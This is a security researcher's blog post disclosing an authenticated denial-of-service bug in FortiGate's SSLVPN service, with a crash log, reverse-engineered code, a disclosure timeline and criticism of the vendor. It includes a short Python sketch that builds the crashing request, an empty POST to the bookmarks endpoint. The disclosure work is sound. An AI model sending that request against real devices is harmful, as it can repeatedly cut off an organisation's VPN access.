Fortinet and The Accidental Bug


As part of our Continuous Automated Red Teaming and Attack Surface Management capabilities delivered through the watchTowr Platform, we see a lot of different bugs in a lot of different applications through a lot of different device types. We're in a good position to remark on these bugs and draw conclusions about different software vendors.

Our job is to find vulnerabilities, and we take a lot of pride in doing so - it's complex and intricate work. But, it is deeply concerning when this work is trivial in targets that are supposed to be a bastion of security. One common theme that we've seen a lot is that appliances, designed to be deployed at security boundaries, are often littered with trivial security issues.

Today we'd like to share one such example: a scarily-easy-to-exploit vulnerability in the SSLVPN component of Fortinet's FortiGate devices, which we discovered during our research into a totally unrelated bug - and which, at the time of writing, still hasn't been fixed, despite an extension to the usual 90-day disclosure period.

Before We Begin

So. Let's talk about bugs in general. Bugs are, let's face it, a fact of life. Every vendor has them, and sometimes, they turn into fully-fledged vulnerabilities. There is a common knee-jerk reaction to avoid software by vendors that have had recent, hyped bugs, but this is usually short-sighted folly. All vendors have bugs. All vendors have vulnerabilities.

... However ...

Some bugs are more understandable than others, and indeed, some bugs make us question the security posture of the responsible parties.

I'm sure you remember a previous post in which I go into detail about CVE-2022-42475, a vulnerability in a Fortinet appliance which was a pretty serious oh-no-the-sky-is-falling bug for a lot of enterprises. But let's remember our mantra - fair enough, bugs happen, let's not pile on to Fortinet for it.

The Bug

With apologies to Webcomic Name

While researching CVE-2022-42475 as part of our rapid-reaction capability for clients, we started to notice some unusual errors in our test equipment's logging. The sslvpn process was seemingly dying with a segfault. Initially, we imagined we were triggering our targeted bug for analysis via a different code path.

Unfortunately, this was not the case - it turned out to be a completely new bug, found entirely by accident. This was determined by taking a look at the debug log (via diagnose debug crashlog read), which helpfully yields a stack trace:

15: 2022-12-13 05:35:29 <01230> application sslvpnd
16: 2022-12-13 05:35:29 <01230> *** signal 11 (Segmentation fault) received ***
17: 2022-12-13 05:35:29 <01230> Register dump:
18: 2022-12-13 05:35:29 <01230> RAX: 0000000000000000   RBX: 0000000000000003
19: 2022-12-13 05:35:29 <01230> RCX: 00007fff7f4761d0   RDX: 00007fa8b2961818
20: 2022-12-13 05:35:29 <01230> R08: 00007fa8b2961818   R09: 0000000002e54b8a
21: 2022-12-13 05:35:29 <01230> R10: 00007fa8b403e908   R11: 0000000000000030
22: 2022-12-13 05:35:29 <01230> R12: 00007fa8b296f858   R13: 0000000002dc090f
23: 2022-12-13 05:35:29 <01230> R14: 00007fa8b3764800   R15: 00007fa8b2961818
24: 2022-12-13 05:35:29 <01230> RSI: 00007fa8b2961440   RDI: 00007fa8b296f858
25: 2022-12-13 05:35:29 <01230> RBP: 00007fff7f4762a0   RSP: 00007fff7f4761a0
26: 2022-12-13 05:35:29 <01230> RIP: 00000000015e2f84   EFLAGS: 0000000000010286
27: 2022-12-13 05:35:29 <01230> CS:  0033   FS: 0000   GS: 0000
28: 2022-12-13 05:35:29 <01230> Trap: 000000000000000e   Error: 0000000000000004
29: 2022-12-13 05:35:29 <01230> OldMask: 0000000000000000
30: 2022-12-13 05:35:29 <01230> CR2: 0000000000000040
31: 2022-12-13 05:35:29 <01230> stack: 0x7fff7f4761a0 - 0x7fff7f4793b0 
32: 2022-12-13 05:35:29 <01230> Backtrace:
33: 2022-12-13 05:35:29 <01230> [0x015e2f84] => /bin/sslvpnd  
34: 2022-12-13 05:35:29 <01230> [0x015e3335] => /bin/sslvpnd  
35: 2022-12-13 05:35:29 <01230> [0x01586f08] => /bin/sslvpnd  
36: 2022-12-13 05:35:29 <01230> [0x01592c82] => /bin/sslvpnd  
37: 2022-12-13 05:35:29 <01230> [0x016a4c9d] => /bin/sslvpnd  

A segfault such as this would often indicate a bug exploitable for remote code execution, and so our interest was piqued. Let's take a look at the faulting code:

mov     rax, [rbp+var_F8]
mov     rdx, r15
mov     rdi, r12
mov     r9, [rbp+var_F0]
mov     rsi, [rbp+var_D8]
lea     rcx, [rbp+var_D0]
movzx   r8d, byte ptr [rax+40h] <-- crash here
call    sub_15E1F80

As you can see, we're dereferencing a NULL pointer and passing the result to another function. In a higher-level language, such as C, the code might look like this (I've added guessed variable names to try to make things more informative):

sub_15E1F80(conn, reqInfo, helper, &var_D0, var_F8->memberAt0x40, unknown);

The NULL dereference is occurring because the var_F8 variable contains zero (you can see from the register dump above that the RAX register is, indeed, zero). But why? What is this member supposed to hold, and why isn't it being set?
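In other words, the return value of sub_16B8300 is dereferenced without any NULL check. Here's a minimal Python sketch of that pattern - all names are hypothetical, since at this point we don't yet know what the structure represents:

```python
# Hypothetical sketch of the unchecked-dereference pattern; names are guesses.
class UnknownStruct:
    def __init__(self):
        self.member_at_0x40 = 0  # models the byte read at offset 0x40


def sub_16B8300_model(ok: bool):
    """Model of sub_16B8300: under some condition it returns NULL (None)."""
    return UnknownStruct() if ok else None


def vulnerable_handler(ok: bool) -> int:
    s = sub_16B8300_model(ok)
    # The real code performs the read below unconditionally; when s is
    # NULL, the process faults reading [rax+0x40] - note CR2 in the
    # register dump above is exactly 0x40, i.e. NULL plus the offset.
    if s is None:
        raise RuntimeError("NULL dereference - sslvpnd would segfault here")
    return s.member_at_0x40
```

The CR2 value of 0x40 in the crash log is the give-away: the faulting address is the member offset added to a NULL base pointer.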

Well, it's quite difficult to know for sure, given only a stripped binary. But we can make some guesses. Since var_F8 is assigned to the result of the function sub_16B8300, let's take a look at what the other callers of this function do with the result. Here's one:

    v4 = sub_16B8300(a2);
    if ( v4->memberAt0x40 )
      v7 = AF_INET6;
    else
      v7 = AF_INET;
    v9 = socket(v7, 1, 6);

It looks like the result is tested to see whether it represents an IPv4 or an IPv6 socket, and a socket is instantiated accordingly. It seems likely that this function returns some kind of socket, perhaps attached to the IO of the request. Another function is more cryptic, but demonstrates the bit-twiddling that is a signature of socket and file descriptor code:

v5 = sub_16B8300(v3);
v14 = ((*(*(v5 + 80) + 112LL) >> 3) ^ 1) & 1;
v5->memberAt0x40 = v14;
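That middle line is less mysterious than it looks: stripped of the pointer-chasing, it simply extracts bit 3 of some flags word and inverts it. A quick Python sanity check of the expression:

```python
def inverted_bit3(flags: int) -> int:
    """Mirrors the decompiled ((x >> 3) ^ 1) & 1: isolate bit 3, invert it."""
    return ((flags >> 3) ^ 1) & 1
```

So whatever flag lives at bit 3 (plausibly an address-family or connection-state bit - that part is a guess), the member at offset 0x40 ends up holding its inverse.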

Going back to our crash itself, it's interesting to note that the crash occurs when we send an HTTP POST request to /remote/portal/bookmarks containing no data payload. This would seem to align with our 'IO of the request' theory - if the POST request has a Content-Length of zero, the socket may be closed before the handler gets a chance to run.
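For completeness, the trigger amounts to nothing more exotic than a bodiless POST. A sketch of the raw request follows - note that the session-cookie name is our assumption for illustration, and that (as discussed below) authentication is required before this endpoint is reachable:

```python
def build_trigger_request(host: str, session_cookie: str) -> bytes:
    """Builds the raw, bodiless HTTP POST described above.
    The SVPNCOOKIE cookie name is an assumption for illustration."""
    lines = [
        "POST /remote/portal/bookmarks HTTP/1.1",
        f"Host: {host}",
        f"Cookie: SVPNCOOKIE={session_cookie}",
        "Content-Length: 0",
        "",  # blank line terminating the headers
        "",  # no body follows
    ]
    return "\r\n".join(lines).encode()
```

With a Content-Length of zero, the handler's IO context is (we believe) never set up, and the dereference above lands on NULL.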

It is somewhat alarming that the crash is so easy to trigger, although we are somewhat relieved to report that authentication as a VPN user is required before this endpoint is accessible. Additionally, the results of a more involved analysis, carried out by watchTowr engineers, indicate that exploitation is limited to this denial-of-service condition and does not permit code execution.

However, one could easily imagine a disgruntled employee running a script to repeatedly crash the SSLVPN process - or, worse yet, an attacker trying to prevent access to an environment in order to hinder the response to another cyber security incident - both scenarios rendering the VPN unusable for the entire workforce. While it's not as bad as the world-ending remote-code-execution bugs we've seen lately (some of which, indeed, were released as this post was in the final stages of being drafted), it's still a worrisome bug.

When I say this bug is 'worrisome', I mean this on more than one level. On the surface, of course, it allows adversaries to crash a system service. But it is also worrisome in its pure simplicity.

A Trend

It would be nice if we could say that discovering this bug was a one-in-a-million chance, or that it required the skill of a thousand 'Thought Leaders' - but this just isn't the case based on our experience thus far.

The fact that we discovered this bug while hunting for details of a separate bug does not inspire confidence in the target, and the simplicity of the bug trigger is alarming. While we usually shy away from remarking on a vendor's internal development processes due to the inherent lack of visibility we have, it is very difficult to resist in this case. This does seem very much like the kind of 'textbook' condition that could be discovered very easily by anyone with a basic HTTP fuzzer, which raises serious questions about how much assurance Fortinet is really in a position to provide to its userbase. Bugs are an inevitable fact of life, but at least some bugs should not make it to production.

It is, of course, risky for an outside organisation such as ours to make such statements about the internal practices of a software development house. There may be some mitigating reason why this bug wasn't detected earlier - perhaps some complexity hidden within the SDLC of which we are unaware. Even so, we find it difficult to imagine how simple end-to-end HTTP fuzzing would fail to locate a bug like this before a release to production.

One way we can get a further glimpse into Fortinet's practices is by sifting through their release notes. Taking a cursory look reveals some truly alarming bugs - my personal favourite was "WAD crash with signal 11 caused by a stack allocated buffer overflow when parsing Huffman-encoded HTTP header name if the header length is more than 256 characters". It is difficult to imagine a scenario in which that doesn't yield a serious security issue, yet Fortinet don't go into details, and we were unable to locate any security advisory related to this bug, which means that for many people it has gone unnoticed. I imagine the kind of threat actors who are specifically interested in routing platforms comb these release notes, looking for easy quick-wins, exploitable n-day bugs which administrators are not aware of.

Another way to evaluate how seriously Fortinet takes this issue is in their response to it. Fortinet were given the industry-standard 90-day grace period to patch the issue, with an additional extension granted to allow them to fit into their regular release cycle. However, not only did Fortinet neglect to release a fixed version of the 7.2 branch, but the release notes for fixed versions of the 7.0 and 7.4 branches (7.0.11 and 7.4.0) don't appear to mention the bug at all, leaving those users who haven't read this watchTowr blog in the dark as to the urgency of an upgrade.


It is very easy, as a security researcher, to blame software vendors for poor security practices or the presence of 'shallow' bugs, and so we try very hard to avoid doing so - software development is difficult. Security is just one component in a modern software development lifecycle, and it is a fact of life that some bugs will inevitably "slip through the 'net" (you see what I did there?) and make it into production software.

However, there is a limit to how far we will set aside our sense of responsibility to the wider Internet. When vendors have bugs this shallow, this frequently, that is perhaps cause for alarm - and when bugs are buried in release notes, there is serious cause for concern - all in our opinion. The only thing worse than finding out that your firewall is vulnerable to remote code execution is not finding out.

It was not, indeed, fine

Being the responsible people we are, we also notified Fortinet of this discovery in accordance with our VDP.

Fortinet were prompt in their confirmation of the bug, and released fixes for two of the three branches of FortiOS that they maintain - the bug is fixed in versions 7.0.11 and 7.4.0. The FortiGuard team then requested that we extend our usual 90-day release window until 'the end of May' to allow them to release a fix for the 7.2 branch, version 7.2.5 - a proposal which watchTowr accepted. However, this release has not materialised, and as such there is currently no released fix for the 7.2 branch. Those who operate such devices are advised to restrict SSLVPN use to trusted users if at all possible - hardly an acceptable workaround, in our opinion.

Here at watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.


Date - Detail
13th February 2023 - Initial disclosure to vendor; vendor acknowledges receipt
2nd March 2023 - Follow-up email to vendor
2nd March 2023 - Vendor replies that they are working on the issue and cannot provide a specific date, but will keep watchTowr informed as the fix progresses
3rd April 2023 - watchTowr informs vendor that it has adopted an industry-standard 90-day disclosure window, and requests that a fix be released before this window expires
5th April 2023 - Vendor replies that a fix has already been developed and released for version 7.0.11 of FortiOS. Vendor also reveals that fixes have been developed for versions 7.2.5 and 7.4.0, due to be released 'end of May' and 'end of April' respectively. Vendor requests that we delay disclosure until 'end of May' to align with their release schedule; watchTowr agrees
31st May 2023 - Disclosure deadline; watchTowr requests that vendor share CVE and/or 'Bug ID' identifiers to aid clients in tracking the issue
31st May 2023 - Vendor requests additional time to develop a fix; watchTowr does not agree

DISCLAIMER: This blogpost contains the personal opinions and perspectives of the author. The views expressed in this blogpost are solely those of the author and do not necessarily reflect the opinions or positions of any other individuals, organizations, or entities mentioned or referenced herein.

The information provided in this blogpost is for general informational purposes only. It is not intended to provide professional advice, nor definitive conclusions about internal software development processes or security posture. All opinions have been inferred from the experiences of the author.